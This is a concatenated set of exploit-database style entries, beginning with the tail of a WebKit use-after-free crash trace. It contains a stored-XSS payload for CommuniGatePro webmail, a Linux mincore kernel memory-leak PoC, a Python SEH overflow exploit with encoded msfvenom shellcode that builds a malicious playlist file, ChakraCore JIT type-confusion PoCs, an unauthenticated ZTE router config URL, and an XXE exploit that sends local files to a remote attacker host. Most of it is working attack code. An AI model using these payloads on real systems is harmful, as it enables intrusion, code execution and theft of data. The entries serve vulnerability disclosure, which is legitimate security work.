#3 0x123823d6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d)
#4 0x1237aa247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247)
#5 0x1237a963a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a)
#6 0x114da35b8 in WTF::ThreadSafeRefCountedBase::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1545b8)
#7 0x115789203 in WebCore::Frame::create(WebCore::Page*, WebCore::HTMLFrameOwnerElement*, WebCore::FrameLoaderClient*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb3a203)
#8 0x1108b8f00 in WebKit::WebFrame::createSubframe(WebKit::WebPage*, WTF::String const&, WebCore::HTMLFrameOwnerElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x76ef00)
#9 0x1108d12eb in WebKit::WebFrameLoaderClient::createFrame(WebCore::URL const&, WTF::String const&, WebCore::HTMLFrameOwnerElement&, WTF::String const&, bool, int, int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x7872eb)
#10 0x1179a820f in WebCore::SubframeLoader::loadSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::String const&, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d5920f)
#11 0x1179a637e in WebCore::SubframeLoader::loadOrRedirectSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d5737e)
#12 0x1179a5f57 in WebCore::SubframeLoader::requestFrame(WebCore::HTMLFrameOwnerElement&, WTF::String const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d56f57)
#13 0x1159cb45e in WebCore::HTMLFrameElementBase::openURL(WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd7c45e)
#14 0x11501be08 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChange const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cce08)
#15 0x11501a396 in WebCore::ContainerNode::parserAppendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cb396)
#16 0x115961cdc in WebCore::executeInsertTask(WebCore::HTMLConstructionSiteTask&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd12cdc)
#17 0x11595aea7 in WebCore::HTMLConstructionSite::executeQueuedTasks() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0bea7)
#18 0x11598ac8a in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3bc8a)
#19 0x11598a849 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3b849)
#20 0x1159899c2 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a9c2)
#21 0x11598b4e8 in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3c4e8)
#22 0x115369531 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x71a531)
#23 0x1154a663d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x85763d)
#24 0x115467736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736)
#25 0x114ee3047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047)
#26 0x114edbdf1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1)
#27 0x1179b3661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661)
#28 0x110c5d43b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b)
#29 0x110c606d9 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x45a56) in WTF::UniqueRef<WebCore::FrameLoader>::get()
Shadow bytes around the buggy address:
0x1c22000110e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1c22000110f0: 00 00 00 fa fa fa fa fa fa fa fa fa fa fa fa fa
0x1c2200011100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1c2200011110: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
0x1c2200011120: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x1c2200011130: fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd
0x1c2200011140: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa
0x1c2200011150: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c2200011160: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c2200011170: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c2200011180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==689==ABORTING
-->
# Exploit Title: CommuniGatePro webmails Multiple Stored XSS
# Date: 15/11/2017
# Exploit Author: Boumediene KADDOUR
# Unit: Algerie Telecom R&D Unit
# Vendor Homepage: https://www.stalker.com/
# Software Link: http://www.stalker.com/ (paid product)
# Version: 6.1.16<
# Tested on: production server on crystal, pronto and pronto4 webmails from gmail and hotmail.
CommuniGatePro 6.1.16 webmails (crystal, pronto and pronto4) suffer from multiple stored XSS vulnerabilities. The bellow details illustrate the impact of this vulnerability.
Vulnerability Description:
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
Vulnerability details (Stored XSS):
This vulnerability allowed us to gain access to the following:
Control the victim's mailbox by just reading my email
Control the victim's computer in case the person uses Internet Explorer 8 which is widely used in our company.
Send emails on behalf the victim
Deface the whole victim mailbox
Invoke the malicious piece of code each time an attachment's sent to the victim.
Vulnerable sections:
Calendar
Files
Tasks
Notes
Inbox
Attack Narratives and Scenarios:
1. Calendar:
Source webmail: tested with gmail and hotmail
Destination webmail: Crystal
In order to deliver our PoC, we have taken the advantages of google calendar to achieve our goal.
PoC:
POST /calendar/event HTTP/1.1
Host: calendar.google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://calendar.google.com/calendar/render?tab=mc
X-If-No-Redirect: 1
X-Is-Xhr-Request: 1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 634
Cookie: Mycookie
Connection: close
sf=true&output=js&action=CREATE&useproto=true&add=boumediene.k%40victim.dz%2Csnbemail%40gmail.com&crm=BUSY&icc=DEFAULT&sprop=goo.allowModify%3Afalse&sprop=goo.allowInvitesOther%3Atrue&sprop=goo.showInvitees%3Atrue&pprop=eventColor%3Anone&eid=762dgnlok9l44rd63im4kisjnd&eref=762dgnlok9l33rd55im4kisjnd&cts=1511425384353&text=%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(document.cookie)%3E&location=Stored%20XSS&details=Stored%20XSS&src=snbemail%40gmail.com&dates=20171123T093000%2F20171123T103000&unbounded=false&gdoc-attachment&scfdata=W1tdXQ..&stz&etz&scp=ONE&nopts=2&nopts=3&nopts=4&hl=en_GB&secid=6VLs1BGsgBB_Tqz6egnXpCYYF24
Once the victim receives the invitation, he/she will not be obliged to click on any link or download any file. The only condition for this PoC to work is a single click to read the email. Once the victim reads the email, the code gets executed on the victim's browser ending up sending sensitive data to the adversary.
2. Files:
Source webmail: pronto/pronto4/Crystal
Destination webmail: Crystal
In order to leverage this vulnerability, a victim must first acquire a local mailbox. What he/she will do is the following:
Go to file section.
Create a directory
Name the directory with any JavaScript code, in our case (<img src=X onerror=alert(document.cookie)>)
Share or grant access to victim to be able to at least read the content of the directory
The victim then recieves the email of granting access to that directory
The vitim reads the email and then accesses the directory ending up executing the code within its scope of work
3. Notes:
Source webmail: Crystal
Destination webmail: Crystal
In order to leverage this vulnerability, a victim must first acquire a local mailbox. What he/she will do is the following:
Create a note
Put the JavaScript code within it
Share it with the victim
4. Tasks:
Source webmail: pronto/pronto4
Destination webmail: Crystal
In order to leverage this vulnerability, a victim must first acquire a local mailbox. What he/she will do is the following:
Create a task
Put the JavaScript code within the task name
publish it
5. Inbox
Source webmail: pronto/pronto4
Destination webmail: Crystal
In order to leverage this vulnerability, a victim must first acquire a local mailbox. What he/she will do is the following:
Create an html file with malicious JavaScript piece of code
Make use of Pronto to send the email to the victim
The victim reads the email using Crystal webmail and the code gets executed.
Remediation:
Sanitize, escape and validate user supplied data accordingly
Vulnerability Disclosure Timeline:
==================================
23 Nov, 17 5:36:09 PM: Vendor Notification
23 Nov, 17 6:56:33 PM: Vendor Response/Feedback
24 Nov, 17 : Vendor released new patched version 6.2.1 and included fixes on version 6.1.19 as a separate Crystal skin package (to be installed as cluster/server-wide custom skin)
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
I found the following bug with an AFL-based fuzzer:
When __walk_page_range() is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore() assumes that it will always get callbacks for all pages in the range passed to walk_page_range(), and when this assumption is violated, sys_mincore() copies uninitialized memory from the page allocator to userspace.
This bug can be reproduced with the following testcase:
$ cat mincore_test.c
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/mman.h>
#include <err.h>
#include <stdio.h>
unsigned char mcbuf[0x1000];
int main(void) {
if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)
err(1, "mmap");
for (int i=0; i<10000; i++) {
if (mincore((void*)0x86000000, 0x1000000, mcbuf))
perror("mincore");
write(1, mcbuf, 0x1000);
}
}
/*
$ gcc -o mincore_test mincore_test.c -Wall
$ ./mincore_test | hexdump -C | head
00000000 00 00 00 00 00 00 00 00 00 00 00 00 fe 01 00 00 |................|
00000010 80 49 3d 20 c6 e9 ff ff c0 49 3d 20 c6 e9 ff ff |.I= .....I= ....|
00000020 00 08 3c 20 c6 e9 ff ff 40 08 3c 20 c6 e9 ff ff |..< ....@.< ....|
00000030 80 08 3c 20 c6 e9 ff ff c0 08 3c 20 c6 e9 ff ff |..< ......< ....|
00000040 00 09 3c 20 c6 e9 ff ff 40 09 3c 20 c6 e9 ff ff |..< ....@.< ....|
00000050 80 09 3c 20 c6 e9 ff ff c0 09 3c 20 c6 e9 ff ff |..< ......< ....|
00000060 00 06 3c 20 c6 e9 ff ff 40 06 3c 20 c6 e9 ff ff |..< ....@.< ....|
00000070 80 06 3c 20 c6 e9 ff ff c0 06 3c 20 c6 e9 ff ff |..< ......< ....|
00000080 00 07 3c 20 c6 e9 ff ff 40 07 3c 20 c6 e9 ff ff |..< ....@.< ....|
00000090 80 07 3c 20 c6 e9 ff ff 80 78 84 0b c6 e9 ff ff |..< .....x......|
fixed at https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=373c4557d2aa362702c4c2d41288fb1e54990b7c
The fix has landed in the following upstream stable releases:
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.14.2
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.13.16
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.9.65
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.101
*/
#!/usr/bin/python
# Tested on: Windows 10 Professional (x86)
# Exploit for previous version: https://www.exploit-db.com/exploits/42455/ (Seems they haven't patched the vulnerability at all :D)
# msfvenom -p windows/exec CMD="calc.exe" -e x86/unicode_mixed BufferRegister=EAX -f python
shellcode = ""
shellcode += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
shellcode += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
shellcode += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
shellcode += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
shellcode += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
shellcode += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
shellcode += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
shellcode += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
shellcode += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
shellcode += "\x47\x42\x39\x75\x34\x4a\x42\x39\x6c\x5a\x48\x33\x52"
shellcode += "\x69\x70\x69\x70\x6d\x30\x31\x50\x53\x59\x79\x55\x30"
shellcode += "\x31\x75\x70\x6f\x74\x72\x6b\x42\x30\x6e\x50\x52\x6b"
shellcode += "\x4e\x72\x7a\x6c\x52\x6b\x4e\x72\x6a\x74\x44\x4b\x71"
shellcode += "\x62\x6c\x68\x7a\x6f\x34\x77\x50\x4a\x6f\x36\x30\x31"
shellcode += "\x4b\x4f\x74\x6c\x6d\x6c\x43\x31\x63\x4c\x7a\x62\x6e"
shellcode += "\x4c\x4d\x50\x47\x51\x66\x6f\x6c\x4d\x79\x71\x55\x77"
shellcode += "\x68\x62\x6a\x52\x31\x42\x31\x47\x42\x6b\x6e\x72\x6c"
shellcode += "\x50\x64\x4b\x30\x4a\x4d\x6c\x62\x6b\x6e\x6c\x4c\x51"
shellcode += "\x63\x48\x5a\x43\x6f\x58\x4b\x51\x48\x51\x72\x31\x62"
shellcode += "\x6b\x71\x49\x4d\x50\x59\x71\x46\x73\x72\x6b\x6e\x69"
shellcode += "\x7a\x78\x48\x63\x6c\x7a\x61\x39\x44\x4b\x6c\x74\x64"
shellcode += "\x4b\x4b\x51\x37\x66\x70\x31\x69\x6f\x54\x6c\x39\x31"
shellcode += "\x46\x6f\x5a\x6d\x79\x71\x58\x47\x4f\x48\x69\x50\x53"
shellcode += "\x45\x6c\x36\x6d\x33\x43\x4d\x49\x68\x6d\x6b\x61\x6d"
shellcode += "\x6c\x64\x51\x65\x58\x64\x72\x38\x72\x6b\x4f\x68\x4e"
shellcode += "\x44\x39\x71\x46\x73\x4f\x76\x52\x6b\x4c\x4c\x30\x4b"
shellcode += "\x34\x4b\x70\x58\x6d\x4c\x4d\x31\x58\x53\x64\x4b\x49"
shellcode += "\x74\x64\x4b\x6b\x51\x38\x50\x75\x39\x6e\x64\x4b\x74"
shellcode += "\x6e\x44\x31\x4b\x51\x4b\x6f\x71\x62\x39\x4f\x6a\x70"
shellcode += "\x51\x49\x6f\x47\x70\x31\x4f\x51\x4f\x31\x4a\x54\x4b"
shellcode += "\x6d\x42\x38\x6b\x34\x4d\x61\x4d\x30\x6a\x79\x71\x54"
shellcode += "\x4d\x74\x45\x77\x42\x79\x70\x4d\x30\x69\x70\x30\x50"
shellcode += "\x51\x58\x70\x31\x72\x6b\x42\x4f\x42\x67\x6b\x4f\x57"
shellcode += "\x65\x35\x6b\x68\x70\x47\x45\x34\x62\x4f\x66\x62\x48"
shellcode += "\x73\x76\x44\x55\x77\x4d\x43\x6d\x79\x6f\x6a\x35\x6d"
shellcode += "\x6c\x7a\x66\x31\x6c\x69\x7a\x73\x50\x4b\x4b\x4b\x30"
shellcode += "\x31\x65\x4a\x65\x57\x4b\x6d\x77\x4c\x53\x64\x32\x50"
shellcode += "\x6f\x71\x5a\x4b\x50\x51\x43\x6b\x4f\x49\x45\x50\x63"
shellcode += "\x31\x51\x50\x6c\x72\x43\x6e\x4e\x71\x55\x74\x38\x31"
shellcode += "\x55\x6b\x50\x41\x41"
buffer = "http://"
buffer += "\x41" * 301
buffer += "\x61\x41" # POPAD (NSEH)
buffer += "\x0f\x47" # P/P/R (SEH)
buffer += "\x56\x41" # PUSH ESI
buffer += "\x58\x41" # POP EAX
buffer += "\x05\x07\x01\x41" # ADD EAX, 0x1000700
buffer += "\x2d\x04\x01\x41" # SUB EAX, 0x1000400
buffer += "\x50\x41" # PUSH EAX
buffer += "\xc3" # RET
buffer += "\x41" * 45
buffer += shellcode
buffer += "\x41" * (1500 - len(buffer))
f=open("player.m3u",'wb')
f.write(buffer)
f.close()
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1366
Here's a snippet of Inline::Optimize.
FOREACH_INSTR_EDITING(instr, instrNext, func->m_headInstr)
{
switch (instr->m_opcode)
{
case Js::OpCode::Label:
{
...
if (instr->AsLabelInstr()->m_isForInExit)
{
Assert(this->currentForInDepth != 0); // The PoC hits this
this->currentForInDepth--;
}
}
break;
case Js::OpCode::InitForInEnumerator:
if (!func->IsLoopBody())
{
this->currentForInDepth++;
}
break;
case Js::OpCode::CallI:
...
instrNext = builtInInlineCandidateOpCode != 0 ?
this->InlineBuiltInFunction(instr, inlineeData, builtInInlineCandidateOpCode, inlinerData, symThis, &isInlined, profileId, recursiveInlineDepth) :
this->InlineScriptFunction(instr, inlineeData, symThis, profileId, &isInlined, recursiveInlineDepth);
...
}
}
"InlineBuiltInFunction" and "InlineScriptFunction" are used to inline a JavaScript function. For example, those methods can convert a call expression as follws.
Before:
s6.var = StartCall 1 (0x1).i32 #0000
arg1(s7)<0>.var = ArgOut_A s2.var, s6.var #0003
CallI s3.var, arg1(s7)<0>.var #0006
s0.var = Ld_A 0xXXXXXXXX (undefined)[Undefined].var #000c <<--- NEXT INSTRUCTION
After:
s6.var = StartCall 1 (0x1).i32 #0000
...
s12.var = InlineeStart s3.var, iarg1(s7)<24>.var #0006 Func # (#1.3), #4 obj.inlinee
s9[Object].var = Ld_A 0xXXXXXXXX (GlobalObject)[Object].var # Func # (#1.3), #4
s8.var = Ld_A 0xXXXXXXXX (undefined)[Undefined].var #0000 Func # (#1.3), #4
StatementBoundary #0 #0002 Func # (#1.3), #4
StatementBoundary #-1 #0002 Func # (#1.3), #4
InlineeEnd 4 (0x4).i32, s12.var #0000 Func # (#1.3), #4
StatementBoundary #0 #000c
s0.var = Ld_A 0xXXXXXXXX (undefined)[Undefined].var #000c <<---- NEXT INSTRUCTION
As you can see the inlinee is wrapped in InlineeStart and InlineeEnd. So to handle the orignal next instructions in the next iterations, those methods must return the call instruction's next instruction. But there's a buggy call flow.
Here's the call flow.
Inline::InlineBuiltInFunction(...) {
...
if (inlineCallOpCode == Js::OpCode::InlineFunctionCall)
{
inlineBuiltInEndInstr = InlineCall(callInstr, inlineeData, inlinerData, symCallerThis, pIsInlined, profileId, recursiveInlineDepth);
return inlineBuiltInEndInstr->m_next;
}
...
}
-> InlineCall -> InlineCallTarget ->
Inline::InlineCallApplyTarget_Shared(...) {
IR::Instr* instrNext = callInstr->m_next;
return InlineFunctionCommon(callInstr, originalCallTargetOpndIsJITOpt, originalCallTargetStackSym, inlineeData, inlinee, instrNext, returnValueOpnd, callInstr, nullptr, recursiveInlineDepth, safeThis, isApplyTarget);
}
Inline::InlineFunctionCommon(...)
{
...
return instrNext;
}
The point is that it ends up returning "callInstr->m_next->m_next". Therefore, "callInstr->m_next" will be never processed.
In the PoC, "InitForInEnumerator" will be skipped.
s16[LikelyUndefined_CanBeTaggedValue].var = CallI s6.var, arg2(s15)<8>.var #0015 << will be inlined
InitForInEnumerator s16.var, s17.u64 #001f << Skipped
PoC:
*/
function opt(obj) {
for (let i in obj.inlinee.call({})) {
}
for (let i in obj.inlinee.call({})) {
}
}
function main() {
let obj = {
inlinee: function () {
}
};
for (let i = 0; i < 10000; i++)
opt(obj);
}
main();
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1364
1.
In the Chakra's JIT compilation process, it stores variables' type information by basic block.
function opt(b) {
let o;
if (b) {
// BASIC BLOCK (a)
o = {};
} else {
// BASIC BLOCK (b)
o = 1.1;
}
// BASIC BLOCK (c)
return o;
}
For example, let's think the above code gets optimized. At the basic block (a), the type of "o" is always "Object". At the basic block (b), the type of "o" is always "CanBeTaggedValue_Float". At the basic block (c), it combines the two types, and marks the type of "o" as "CanBeTaggedValue_Mixed"(Object + CanBeTaggedValue_Float).
Explanation of TaggedValue in Chakra: http://abchatra.github.io/TaggedFloat/
But unlike variables, the type information of constants like numbers, strings is managed globally. This means, once a constant is marked as some type in a certain block. All blocks will treat it as that type regardless of the control flow.
2.
Chakra uses a BailOutOnTaggedValue bailout to ensure a variable's type is "Object". The bailouts can be generated when inlining JavaScript functions.
function opt(inlinee) {
inlinee();
}
Generated IR code for the above code:
StatementBoundary #0 #0000
s6.var = StartCall 1 (0x1).i32 #0000
BailOnNotObject s3[LikelyCanBeTaggedValue_Object].var #0006 Bailout: #0006 (BailOutOnInlineFunction)
s10.var = Ld_A [s3[LikelyObject].var+8].u64 #0006
BailOnNotEqual [s10.var!].i32, 26 (0x1A).i32 # Bailout: #0006 (BailOutOnInlineFunction)
BailOnNotEqual [s3[LikelyObject].var+40].u64, 0xXXXXXXXX (FunctionBody [Anonymous function (#1.3), #4]).u64 # Bailout: #0006 (BailOutOnInlineFunction)
As you can see after the "BailOnNotObject" opcode which generates "BailOutOnTaggedValue" bailouts, the type of "s3" becomes "LikelyObject" from "LikelyCanBeTaggedValue_Object". This means there's no case where "s3" is not an object after the opcode which ensures its type, so it's safe to use it as an object without checks after the opcode.
But the problem is that this can be applied to constants.
Here's the PoC.
*/
function opt2(inlinee, v) {
if (v > 0) {
inlinee();
} else {
inlinee.x = 1.1;
}
}
function opt() {
opt2(2.3023e-320, null);
}
function main() {
opt2(() => {}, 1); // feed a function to the profiler
for (let i = 0; i < 10000; i++) {
opt();
}
}
main();
/*
We can simply think it as follows:
(NOT PRECISE just for understanding)
Just after inlining:
// Basic block (a)
s2 = 2.30235E-320; // constant
inlinee = s2; // variable
if (null > 0) {
// Basic block (b)
BailOnNotObject(inlinee);
inlinee();
} else {
// Basic block (c)
inlinee.x = 1.1;
}
Type map:
Constants:
s2: CanBeTaggedValue_Float
Basic block (a):
inlinee: CanBeTaggedValue_Float
Basic block (b):
inlinee: CanBeTaggedValue_Float
Basic block (c):
inlinee: CanBeTaggedValue_Float
In the Global Optimization Phase:
// Basic block (a)
s2 = 2.30235E-320;
if (null > 0) {
// Basic block (b)
BailOnNotObject(s2);
s2();
} else {
// Basic block (c)
s2.x = 1.1;
}
Type map:
Constants:
s2: CanBeTaggedValue_Float -> Float
Basic block (a):
Basic block (b):
Basic block (c):
At the basic block (b), the BailOnNotObject opcode changes the type of "s2" to "Float". And since "s2" is a constant, that change affects the basic block (c). So it leads to type confusion at the basic block (c).
Note: Just "Float" is considered an Object type.
*/
# Exploit Title: ZTE ZXDSL 831 Unauthorized Configuration Access
# Date: 27/11/2017
# Exploit Author: Ibad Shah
# Vendor Homepage: zte.com.cn
# Software Link: -
# Version: - ZXDSL - 831CII
# Tested on: Windows 10
# CVE :- 2017-16953
=======================================
The Router usually servers html files & are protected with HTTP Basic
Authentication. However, the CGI files does not protect this file from
getting exposed to public. A Simple GET request would be needed to
made to router that would give a remote attacker an opportunity to
modify router PPPoE configurations, setup malicious configurations
which later could lead to disrupt network & its activities.
Proof Of Concept
================
http://192.168.1.1/connoppp.cgi
[+] Exploit Title: Diving Log 6.0 XXE Injection
[+] Date: 27-11-2017
[+] Exploit Author: Trent Gordon
[+] Vendor Homepage: http://www.divinglog.de
[+] Software Link: http://www.divinglog.de/english/download/
[+] Disclosed at: https://thenopsled.com/divinglog.txt
[+] Version: 6.0
[+] Tested on: Windows 7 SP1, Windows 10
[+] CVE: CVE-2017-9095
==================
Background:
==================
Diving Log 6.0 is a scuba diving log software that manages and consolidates logs from other disparate sources. Many scuba diving log software programs export their data in an XML file.
==================
Vulnerability:
==================
By having a user import a crafted dive.xml file (very common, many divers share logs), it is possible to execute a XXE injection which retrieves local files and exfiltrates them to a remote attacker.
1.)Open Diving Log 6.0
2.)Close "Welcome Center" popup and select "Import" from the bottom left corner
3.)Select "Subsurface" from the list of import data types.
4.)"Open File" and select the crafted dive.xml file (with listener open on ATTACKERS-IP)
==================
Proof of Concept:
==================
a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting payload.dtd)
b.) Hosted "payload.dtd"
<?xml version="1.0" encoding="utf-8" ?>
<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://ATTACKERS-IP?%data;'>">
c.) Exploited "dive.xml"
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP/payload.dtd">
%sp;
%param1;
%exfil;
]>
<divelog program='subsurface' version='3'>
<settings>
</settings>
<divesites>
<site uuid='33a32a07' name='hacked'>
</site>
</divesites>
<dives>
<dive number='1' divesiteid='33a32a07' date='2017-05-15' time='14:49:10' duration='46:00 min'>
<notes></notes>
<cylinder size='11.1 l' workpressure='207.0 bar' description='unknown' />
<divecomputer model='manually added dive'>
<depth max='15.0 m' mean='13.37 m' />
<surface pressure='1.013 bar' />
<sample time='0:00 min' depth='0.0 m' />
<sample time='3:00 min' depth='15.0 m' />
<sample time='40:00 min' depth='15.0 m' />
<sample time='42:00 min' depth='5.0 m' />
<sample time='45:00 min' depth='5.0 m' />
<sample time='46:00 min' depth='0.0 m' />
</divecomputer>
</dive>
</dives>
</divelog>
==================
Additional Attack Vectors:
==================
I tested and exploited the "subsurface" import option, however MANY other dive log software programs use XML and most are available as Import options in Diving Log 6.0. This XXE injection vulnerability is most likely vulnerable in every import option that utilizes XML for the underlying custom file format(.UDCF and .UDDF, for example).